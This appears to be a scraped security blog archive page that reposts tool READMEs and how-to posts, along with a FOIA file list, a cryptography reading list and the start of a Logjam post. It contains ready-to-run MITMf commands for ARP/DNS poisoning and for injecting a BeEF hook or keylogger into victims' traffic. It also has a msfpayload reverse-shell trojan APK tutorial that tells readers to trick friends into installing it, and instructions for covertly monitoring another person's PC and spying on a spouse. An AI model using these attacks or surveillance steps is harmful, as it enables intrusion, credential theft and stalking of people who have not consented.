Never Ending Security

It starts all here

Category Archives: Software

MITMf – Framework for Man-In-The-Middle attacks



MITMf


Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Contact me at:

Before submitting issues, please read the relevant section in the wiki .

Installation

MITMf relies on a LOT of external libraries therefore it is highly recommended you use virtualenvs to install the framework, this avoids permission issues and conflicts with your system site packages (especially on Kali Linux).

Before starting the installation process:

  • On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo
  • On Debian and derivatives (e.g Ubuntu, Kali Linux etc…)
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev

Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

  • Install virtualenvwrapper:
pip install virtualenvwrapper
  • Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh

The location of this script may vary depending on your Linux distro

  • Restart your terminal or run:
source /usr/bin/virtualenvwrapper.sh
  • Create your virtualenv:
mkvirtualenv MITMf -p /usr/bin/python2.7
  • Clone the MITMf repository:
git clone https://github.com/byt3bl33d3r/MITMf
  • cd into the directory, initialize and clone the repos submodules:
cd MITMf && git submodule init && git submodule update --recursive
  • Install the dependencies:
pip install -r requirements.txt
  • You’re ready to rock!
python mitmf.py --help

Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g Ettercap, Mallory), it’s been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

Features

  • The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins, it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
  • As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
  • The configuration file can be edited on-the-fly while MITMf is running, the changes will be passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
  • MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (all supported protocols like HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
  • Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
  • Use the packet variable to access the packet in a Scapy compatible format
  • Use the data variable to access the raw packet data

Now to use the filter all we need to do is: python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!

Examples

The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.2.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

Currently available plugins

  • HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
  • SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
  • ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
  • Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
  • SSLstrip+ : Partially bypass HSTS
  • Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
  • BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
  • AppCachePoison : Performs HTML5 App-Cache poisoning attacks
  • Ferret-NG : Transperently hijacks client sessions
  • BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
  • FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
  • Inject : Inject arbitrary content into HTML content
  • BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
  • JSkeylogger : Injects a Javascript keylogger into a client’s webpages
  • Replace : Replace arbitary content in HTML content
  • SMBAuth : Evoke SMB challenge-response authentication attempts
  • Upsidedownternet : Flips images 180 degrees


More information can be found on: https://github.com/byt3bl33d3r/MITMf


BlindElephant Web Application Fingerprinter



BlindElephant Web Application Fingerprinter


The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant
License: LGPL

Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

Pre-requisites:

  • Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

Get the code:

Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your python installation has distutils, and then do:cd blindelephant/srcsudo python setup.py install(Windows users, omit sudo)

Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

$ BlindElephant.py 
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing
                        to attempt to narrow it down (up to numProbes
                        additional requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to attempt to
discover which supported apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com 

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM

Example Usage (Library):

$python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>> 
>>> #Construct the fingerprinter
>>> #use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> #do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version:  4.23-en-COM

The Static File Fingerprinting Approach in One Picture

Other Projects Like This


More information about BlindElephant can be found on: http://blindelephant.sourceforge.net



Net-Creds – Sniffs Sensitive Data From Interface Or Pcap


Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

Screenshots
Screenie1
Screenie2

Sniffs

  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos

Examples

Auto-detect the interface to sniff

sudo python net-creds.py

Choose eth0 as the interface

sudo python net-creds.py -i eth0

Ignore packets to and from 192.168.0.2

sudo python net-creds.py -f 192.168.0.2

Read from pcap

python net-creds.py -p pcapfile

OSX

Credit to epocs:

sudo easy_install pip
sudo pip install scapy
sudo pip install pcapy
brew install libdnet --with-python
mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
sudo pip install pypcap
brew tap brona/iproute2mac
brew install iproute2mac

Then replace line 74 ‘/sbin/ip’ with ‘/usr/local/bin/ip’.


More Info On: https://github.com/DanMcInerney/net-creds


Duck Hunter



Duck Hunter


Converts a USB Rubber ducky script into a Kali Nethunter friendly format for the HID attack

Original code and concept by @binkybear

Quack

Running Duck Hunter

duckhunter.py -l {us} input.txt output.sh

Suppourts multiple languages: us, fr, de, es, sv, it, uk, ru, dk, no, pt, be

Output file can be run as a regular shell file on Nethunter devices.

Keyboard Commands

Here is a list of commands that will work with your Duck Hunter input file for conversion:

DELAY 1000

In miliseconds, 1000 is equal to 1 second

COMMAND SPACE

Apple command key with space will load spotlight

GUI r

Windows + R key for run

WIN7CMD

Load an elevated command line in Windows 7

WIN8CMD

Load an elevated command line in Windows 8

STRING echo "I love ducks"

We pass text we want to type with the STRING command. STRING will by default press enter at the end of line.

TEXT echo "I love ducky"

TEXT is similar to STRING command but instead of pressing ENTER after text is type, we leave text where it is. Useful if you want to type something then combine with other commands.

Other useful commands:

ALT
CONTROL
CTRL
DELETE
DEL
SHIFT
MENU
APP
ESCAPE
ESC
END
SPACE
TAB
PRINTSCREEN
ENTER
UP
DOWN
LEFT
RIGHT
F1-F10
CAPSLOCK

Keys can also be combined into: CTRL ALT DEL

Mouse Commands

MOUSE LEFTCLICK
MOUSE RIGHTCLICK

Left click and right click.

MOUSE 100 0

Will move 100 pixels to right.

MOUSE 0 -50

Will move 50 pixels up.


More Info on: https://github.com/byt3bl33d3r/duckhunter


Vulnerability Scanners Simply Explained


What Is Vulnerability Scanners ?

According to wikipedia, “A vulnerability scanner is a computer program designed to assess computers, computer systems, networks or applications for weaknesses.
As always, according to me, “Vulnerability scanner is program which is designed to identify the mistakes of a system.”

How Vulnerability Scanner Works ?

The vulnerability scanner works in the same way the antivirus programs does. These scanners, first gather the basic information about the host(target), such as operating system and it’s version, ports and services and then select appropriate test modules.
These vulnerability scanners having a huge database of vulnerabilities and these should be continuously updated.Scheduled scans with these continuously updating scanners can maintain a good security health in the network or system.
Vulnerability scanners not only traces the vulnerabilities but also it fixes and sometimes suggests fix for vulnerability.

What Are The Top Vulnerability Scanners ?

  • IBM AppScan
  • Netsparker
  • Nessus
  • OpenVAS
  • Retina CS Community
  • CORE Impact Pro
  • Nexpose

What Are The Best Online Vulnerability Scanners ?

  • GamaSec
  • Acunetix
  • Websecurify
  • Qualys

5 Vulnerability Scanners

1. OWASP ZAP – Zed Attack Project
 
 
The Zed Attack Proxy Is an easy to use Integrated penetration testing tool for finding vulnerabilities in web applications.It is officially designed for security experts and also for developers and functional testers who are a newbie in penetration testing.ZAP can trace out vulnerabilities automatically and manually.
So Download ZAP now.
For windows :ZAP For Windows
For Linux.     :ZAP For Linux
For Mac        :ZAP For Mac
2. Burp Suite
 
Burp Suite is a collection of tools for web application security testing. It includes a scanner tool for discovering vulnerabilities automatically. It also supports semi automated penetration testing.The burp suite helps to work more faster and effective.
Download Burp Suite
3. OWASP Xenotix XSS Exploit Framework 
 
 
 
OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting vulnerability detection and exploitation framework.It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner.
It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance.
The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.
Download OWASP Xenotix
4. Nessus
 
 
Nessus is a free to use open source powerful vulnerability scanner.Unlike other scanners, the plugins( vulnerability definitions) are also free.It provides lot’s of features like,
  • Client/server can be anywhere on the network.
  • Client/server uses SSL to protect scan results.And lot’s more !
5. Retina Core Impact
 
Retina Community gives you powerful vulnerability management across your entire environment.
For up to 256 IPs free, Retina Community identifies network vulnerabilities(including zero-day), configuration issues, and missing patches across operating systems, applications, devices, and virtual environments.

3 Websites For Vulnerability Research


After doing some research, we have created a small list of websites that will help you to perform vulnerability research. Here it is,

1. Security Tracker

 
Security Tracker provides daily updating huge database to the users. It is really simple to use and effective. Anyone can search the site for latest vulnerability information listed under various categories. Best tool for security researchers.

2. Hackerstorm

 
Hackerstorm provides a vulnerability database tool, which allows users to get almost all the information about a particular vulnerability. Hackerstorm provides daily updates for free but source is available for those who wish to contribute and enhance the tool. Such huge data is provided by http://www.osvdb.org and its contributors.

3. Hackerwatch

 
Hackerwatch is not a vulnerability database, but it is a useful tool for every security researcher. It is mainly an online community where internet users can report and share information to block and identify security threats and unwanted traffic.

How To Bypass SMS Verification Of Any Website/Service


If you don’t want to give your phone number to a website while creating an account, DON’T GIVE IT TO THEM, because today I’m going to show you a trick that you can use to bypass SMS verification of any website/service.

Bypassing SMS Verification:

  • Using Recieve-SMS-Online.info
Recieve SMS Online is a free service that allows anyone to receive SMS messages online. It has a fine list of disposable numbers from India, Romania, Germany, USA, United Kingdom, Netherlands, Italy, Spain and France.
Here is how to use Recieve SMS Online to bypass SMS verification:
Disposable Indian, American numbers
2. Select any phone number from the website, then enter the number as your mobile number on the “Phone number” box:
online sms verification
3. Send the verification code…. ( If that number is not working, skip to the next one)
4. Click on the selected number on the website.  You will be directed to the inbox:
bypass whatsapp verification code android,
5. You can find the verification code in the disposable inbox. Enter the code in the verification code field, then click verify code.
6. The account should now be verified.
There are many free SMS receive services available online. Some of them are given below:

How To Monitor a Remote Computer For Free


Do you want to monitor a remote computer for free? If the answer is yes,….. YOU CAN DO IT! This article is full of tricks and tips that you can use to monitor a remote computer for FREE.

1. Monitor a Computer Remotely with Ammy Admin

 

Ammy admin is a popular software used for remote system administration and educational purposes. You can easily turn this innocent looking software into a spy that allows you to see what’s going on at a remote PC.

Here is how to do it:

1. Download Ammy Admin

[If the link is not working, use this MediaFire link: Download Ammy Admin]

2. Run the program on the computer you want to monitor. A window will appear:

monitor remote computer ammy admin

3. Remember or write down the ID of the PC which is shown in the green field “Your ID”. Then go to Ammy > Settings. Another window will popup:

spy on remote pc ammy admin

4. Uncheck all the checkboxes except the first one (see the above image). Then click on “Access Permissions” button. (If you want to test the video performance, use the “Video system speed test” button). Another window will popup:

Access Permissions ammy admin

5. Uncheck “Protect these settings from remote computer” and then click on the plus button. A small window will appear:

password ammy admin

6. Enter a password and then confirm the password. Click on the “OK” button. Then click “OK” again to save the access permissions.

7. In the main menu, go to Ammy > Service > Install. Ammy Admin will display a message like this:

successfully registered

8. Go to Ammy  > Service > Start. Then close the application. Ammy admin will will automatically run in hidden mode when Windows starts up.

9. Run Ammy Admin on the the computer from which you want to monitor the remote PC.

10. Enter the ID of the child computer on the “client ID/IP” field. Then check “View only” box and click on the “Connect” button.

client ID

11. Ammy admin will display a password box:

free monitoring computer

12. Enter the password that you set up while configuring remote PC and then click on “OK” button.

13. Wait for some time, it will establish a connection to the remote PC and display the live screen:

desktop second

If you want to listen what’s going on at remote PC, click “voice chat” button on the control panel of remote desktop window.

You can also access files in the remote PC by using the “File Manager” button.

You can also turn your PC into a wireless remote control of the distant computer by unchecking the “View only” option.

Let’s move onto the technique #2

 

2.  Monitor a Computer Remotely with ActivTrak

ActivTrack is a cloud based monitoring service that you can use to spy on children, employees or spouse. The company also offers paid plans, but here we are using a free account!

Let’s start!

1. Go to activtrak.com. You will see a page like the below one:

Activtrack monitoring software reviews

2. Enter your email address and then click on “Free Secure Signup”. Wait for some seconds, you will see a pop up box like this:

remotely monitor

3. Enter your name, password, and organization name,  and click on “OK”. Then download the ActivTrak Agent (click on the “Download ActivTrak Agent” button).

activtrak monitoring remote computers

4. After downloading the ActivTrak Agent.msi, install it on the remote computers you want to monitor.

5. Done! go to your computer and then visit https://app.activtrak.com/Account/login. Login with your email and password.

You will see the real time activities of the remote computer:

desktop monitoring with activtrak

You can also use this free account as a remote control for your distant PC, but with less features compared to Ammy Admin.

Problems with the free account are, limited screenshots, “only 3 agents”, “only for one user” and 3GB limited storage. But if you are ready to pay for the service, you can get features like unlimited screenshots, unlimited users, unlimited storage, remote installer, support by phone, data export and ad free experience.

So, if you are going to upgrade your account or create a premium account, click on the below banner (It will help us to pay our bills):

access monitoring software
If you have a suspicion that you are being monitored, check all the processes in the task manager and then use Detekt to scan your computer.
Also use an on-screen keyboard to enter usernames and passwords.

How To Remotely Hack Android using Kali Linux


This is a tutorial explaining how to hack android phones with Kali.
I can’t see any tutorials explaining this Hack/Exploit, so, I made one.
(Still ,you may already know about this)

Step 1: Fire-Up Kali:

  • Open a terminal, and make a Trojan .apk
  • You can do this by typing :
  • msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using yourPublic/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2: Open Another Terminal:

  • Open another terminal until the file is being produced.
  • Load metasploit console, by typing : msfconsole

Step 3: Set-Up a Listener:

  • After it loads(it will take time), load the multi-handler exploit by typing :use exploit/multi/handler
  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

Step 4: Exploit!

  • At last type: exploit to start the listener.
  • Copy the application that you made (Upgrader.apk) from the root folder, to you android phone.
  • Then send it using Uploading it to Dropbox or any sharing website (like:www.speedyshare.com).
  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)
  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However, the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 5: BOOM!

There comes the meterpreter prompt:

See Meterpreter commands here:
http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics

NISTFOIA: FOIA for NIST documents related to the design of Dual EC DRBG



nistfoia


Results of a recent FOIA for NIST documents related to the design of Dual EC DRBG.

These FOIA results are the combined result of two separate requests. Thanks to the following requestors:

  • Matthew Stoller and Rep. Alan Grayson
  • Andrew Crocker and Nate Cardozo of EFF

I have contributed only OCR and hosting. Happy hunting,

Matt Green, 6/5/2014


1.15.2015 production/9.1.2 Keyless Hash Function DRBG.pdf
1.15.2015 production/ANSI X9.82 Discussions.pdf
1.15.2015 production/ANSI X9.82, Part 3 DRBGs Powers point July 20, 2004.pdf
1.15.2015 production/Appendix E_ DRBG Selection.pdf
1.15.2015 production/Comments on X9.82, Part 4_Constructions.pdf
1.15.2015 production/E1 Choosing a DRBG Algorithm.pdf
1.15.2015 production/Five DRBG Algorithms Kelsey, July 2004.pdf
1.15.2015 production/Hash Funciton chart.pdf
1.15.2015 production/Letter of transmittal 1.15.2015 .pdf
1.15.2015 production/Part 4_Constructions for Building and Validating RBG Mechanisms.pdf
1.15.2015 production/Scan_2015_01_27_13_05_55_026.pdf
1.15.2015 production/Validation Testing and NIST Statistical Test Suite July 22, 2004.pdf
1.22.2015 production/10.1.2 Hash function DRBG Using HMAC.pdf
1.22.2015 production/10.1.3 KHF_DRBG.pdf
1.22.2015 production/8.6.7 Nonce.pdf
1.22.2015 production/8.7 Prediction Resistance and Backtracking Resistance.pdf
1.22.2015 production/ANSI X9.82 Part 3 Draft July 2004.pdf
1.22.2015 production/Annex G_Informative DRBG mechanism Security Properties.pdf
1.22.2015 production/Appendix G Informative DRBG Selection.pdf
1.22.2015 production/Comments on X9.82 Part 1, Barker May 18, 2005.pdf
1.22.2015 production/Cryptographic security of Dual_EC_DRBG.pdf
1.22.2015 production/D.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/DRBG Issues Power Point July 20, 2004.pdf
1.22.2015 production/Draft X9.82 Part 3 Draft May 2005.pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm (2).pdf
1.22.2015 production/E.1 Choosing a DRBG Algorithm.pdf
1.22.2015 production/Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Fwd_Final SP 800-90 Barker May 26, 2006.pdf
1.22.2015 production/Kelsey comments on SP April 12, 2006.pdf
1.22.2015 production/Latest SP 800-90 Barker May 5, 2006.pdf
1.22.2015 production/Letter of transmittal 1.22.2015.pdf
1.22.2015 production/SP 800-90 Barker June 28, 2006.pdf
1.22.2015 production/SP 800-90_pre-werb version> Barker May 9, 2006.pdf
1.22.2015 production/Terse Description of two new hash-based DRGBs Kelsey, January 2004.pdf
1.22.2015 production/Two New proposed DRBG Algorithms Kelsey January 2004.pdf
1.22.2015 production/X9.82, RGB, Issues for the Workshop.pdf
6.4.2014 production/001 – Dec 2005 -NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/002 – Dec 2005 – NIST Recomm Random No. Gen (Barker-Kelsey)(2).pdf
6.4.2014 production/003 – Sept 2005 – NIST Recomm Random No. Gen (Barker-Kelsey).pdf
6.4.2014 production/004 – Jan 2004 – Terse Descr. of Two New Hash-Based DRBGs.pdf
6.4.2014 production/005 – Proposed Changes to X9.82 Pt. 3 (Slides).pdf
6.4.2014 production/006 – NIST Chart 1.pdf
6.4.2014 production/007 – RNG Standard (Under Dev. ANSI X9F1) – Barker.pdf
6.4.2014 production/008 – Random Bit Gen. Requirements.pdf
6.4.2014 production/009 – Seed File Use.pdf
6.4.2014 production/010 – NIST Chart 2.pdf
6.4.2014 production/011 – 9.12 Choosing a DRBG Algorithm.pdf
6.4.2014 production/012 – May 14 2005 – Comments on ASC X9.82 Pt. 1 – Barker.pdf
6.4.2014 production/013 – X9.82 Pt. 2 – Non-Deterministic Random Bit Generators.pdf

More info you can find on: https://github.com/matthewdgreen/nistfoia


650.445: PRACTICAL CRYPTOGRAPHIC SYSTEMS



READINGS & SUGGESTED PRESENTATION TOPICS


Protocols

  1. Crosby, Goldberg, Johnson, Song, Wagner: Cryptanalyzing HDCP (2001)

  2. Wagner, Schneier: Analysis of the SSL 3.0 Protocol

  3. Lucks, Schuler, Tews, Weinmann, Wenzel: Security of DECT

  4. Kohno: Analysis of WinZip Encryption

  5. Stubblefield, Ioannidis, Rubin: Breaking WEP

  6. Bellare, Kohno, Namprempre: Breaking and Repairing SSH

  7. Burrows, Abadi and Needham: A Logic of Authentication

  8. DTLA: DTCP Additional Localization Protocol

Side Channel Attacks

  1. Bar-el: Introduction to Side Channel Attacks (white paper)

  2. Kocher: Timing attack on RSA & DL systems

  3. Brumley, Boneh: Remote Timing Attacks are Practical

  4. Bernstein: Cache Timing Attack on AES.  Osvik, Shamir, Tromer: Attacks and Countermeasures

  5. Eisenbarth, Kasper, Moradi, Paar, Salmasizadeh, Shalmani: Attacking KeeLoq (SpringerLink)

  6. Shamir, Tromer: Acoustic Cryptanalysis

  7. Pellegrini, Bertacco, Austin: Fault-Based Attack of RSA Authentication

  8. Aciicmez, Koc, Seifert: Branch Prediction Analysis (very advanced)

Dictionary Attacks: Optimization & Mitigation

  1. Alexander: Password Protection for Modern OSes

  2. RSA Laboratories: PKCS #5 2.0: Password-Based Cryptography Standard

  3. Provos and Mazières: “Future-adaptable” password schemes

  4. Stamp: Once Upon a Time Space Tradeoff

  5. Oeschslin: Rainbow Tables (includes papers & demo)

  6. Canetti, Halevi, Steiner: Mitigating (offline) Dictionary Attacks with Reverse-Turing Tests

    Securing Internet Infrastructure

  7. Jackson, Barth, Bortz, Shao, Boneh: Protecting Browsers from DNS Rebinding Attacks

  8. Kaminsky: It’s the End of the (DNS) Cache As We Know It (Black Hat 2008 – 101MB)

  9. DNSSEC.net: DNS Security Extensions (standards & resources)

  10. Ptacek: A case against DNSSEC

  11. Kent, Lynn and Seo: Secure BGP

  12. BBN.com: Secure BGP resources

Digital Rights Management & Conditional Access

  1. Lawson: Designing and Attacking DRM (presentation)

  2. Edwards: A technical description of the Content Scrambling System (CSS)

  3. Henry, Sui, Zhong: Overview of AACS — and full AACS Specification

  4. ISE: A Comparison of SPDC (technology behind BD+) and AACS (2005)

  5. Craver, Wu, Liu, Stubblefield, Swartzlander, Wallach, Dean, Felten: Watermarking & SDMI

  6. Kuhn: Analysis of the Nagravision Video Scrambling Method (analog scrambling)

  7. Naor, Naor and Lotspiech: Revocation and Tracing Schemes for Stateless Receivers

Software, Physical Security, Backdoors

  1. Halderman et al.: Cold Boot Attacks on Encryption Keys & RSA Key Reconstruction

  2. Young, Yung: Cryptovirology: extortion-based security threats and countermeasures (IEEE)

  3. Dowd: Application-Specific Attacks: Leveraging the ActionScript Virtual Machine

  4. Steil: 17 Mistakes Microsoft Made in the XBox Security (2005)

  5. Bartolozzo et al.: Attacking and Fixing PKCS#11 Security Tokens

  6. Bardou et al.: Efficient Padding Oracle Attacks on Cryptographic Hardware

Privacy and Anonymity

  1. Dingledine, Mathewson, Syverson: Tor: The Second Generation Onion Router

  2. McCoy, Bauer, Grunwald, Kohno, Sicker: Analyzing Tor Usage

  3. Murdoch, Danezis: Low-cost Traffic Analysis of Tor

  4. Murdoch: Hot Or Not: Using clock skew to locate hidden services

  5. Wang, Chen, Jajodia: Tracking Anonymized VoIP Calls

Hash Functions and Random Oracles

  1. Coron, Dodis, Malinaud, Puniya: Merkle-Damgård Revisited

  2. Wang, Yu: How to break MD5 and other hash functions

  3. Stevens, Lenstra, de Weger: Target collisions for MD5

  4. Kaminsky: MD5 To Be Considered Harmful Someday

  5. Sotirov et al.: MD5 considered harmful today (building a rogue CA cert)

  6. Wang, Yin, Yu: SHA1 broken (at least, on its way…)

  7. NIST: “SHA3” competition: list of first round candidates (December 2008)

  8. Canetti, Goldreich, Halevi: Random oracles revisited, and…

  9. Bellare, Boldyreva, Palacio: A more natural uninstantiable Random-Oracle-Model scheme

  10. Coron, Patarin, Seurin: The random oracle model and the ideal cipher model are equivalent

  11. Bellare, Canetti, Krawczyk: HMAC

Symmetric Crypto

  1. Bellare, Namprempre: Authenticated encryption, generic composition

  2. Ferguson: Authentication weaknesses in GCM.  McGrew, Viega: Response & Update.

Public Key Crypto

Bleichenbacher: CCA Attacks against Protocols (SSL) based on PKCS #1

Bellare, Rogaway: Optimal Asymmetric Encryption Padding (OAEP)

Manger: CCA Attacks against Implementations of OAEP

Bernstein: An Introduction to Post-Quantum Cryptography

Random Number Generation

  1. Dorrendorf, Gutterman, Pinkas: RNG Weaknesses in Windows 2000

  2. Gutterman, Pinkas: Flaws in the Linux RNG

  3. Barker, Kelsey: NIST Special Pub. 800-90: Recommendations for PRNGs

  4. Kelsey, Schneier, Wagner, Hall: Cryptanalytic attacks on PRNGs

  5. Schoenmakers, Sidorenko: Dual EC not kosher

  6. Shumow, Ferguson: There May Be a Backdoor in Dual EC.

  7. Keller: ANSI X9.31 (Block cipher-based PRNG). Various artists: FIPS 186-2 (see Appendix 3)

Implementation Issues

  1. Gutmann: Lessons Learned in Implementing and Deploying Crypto Software

  2. Berson: Security Evaluation of Skype (2005, conducted at Skype’s request)

  3. Biondi, Desclaux: Silver Needle in the Skype (2006, REing of Skype binary)

Financial Services

  1. Berkman, Ostrovsky: The Unbearable Lightness of PIN cracking

  2. Bond, Zieliński: Decimalisation table attacks for PIN cracking

  3. Murdoch, Drimer, Anderson, Bond: Chip and PIN is Broken

RFID and Wireless

  1. Nohl, Evans, Starbug, Plötz: Reverse-Engineering a Cryptographic RFID Tag

  2. Bono, Green, Stubblefield, Juels, Rubin, Szydlo: Security Analysis of TI DST Tags

Misc.

  1. Halperin et al.: Pacemakers and ICDs (no crypto)

  2. Ellis: Non-secret Encryption (historically very interesting)

  3. TheGrugq: Opsec for Freedom Fighters

The Logjam Attack


In case you haven’t heard, there’s a new SSL/TLS vulnerability making the rounds. Nicknamed Logjam, the new attack is ‘special’ in that it may admit complete decryption or hijacking of any TLS connection you make to an improperly configured web or mail server. Worse, there’s at least circumstantial evidence that similar (and more powerful) attacks might already be in the toolkit of some state-level attackers such as the NSA.

This work is the result of an unusual collaboration between a fantastic group of co-authors spread all around the world, including institutions such as the University of Michigan, INRIA Paris-Rocquencourt, INRIA Paris-Nancy, Microsoft Research, Johns Hopkins and the University Of Pennsylvania. It’s rare to see this level of collaboration between groups with so many different areas of expertise, and I hope to see a lot more like it. (Disclosure: I am one of the authors.)

The absolute best way to understand the Logjam result is to read the technical research paper. This post is mainly aimed at people who want a slightly less technical form. For those with even shorter attention spans, here’s the TL;DR:

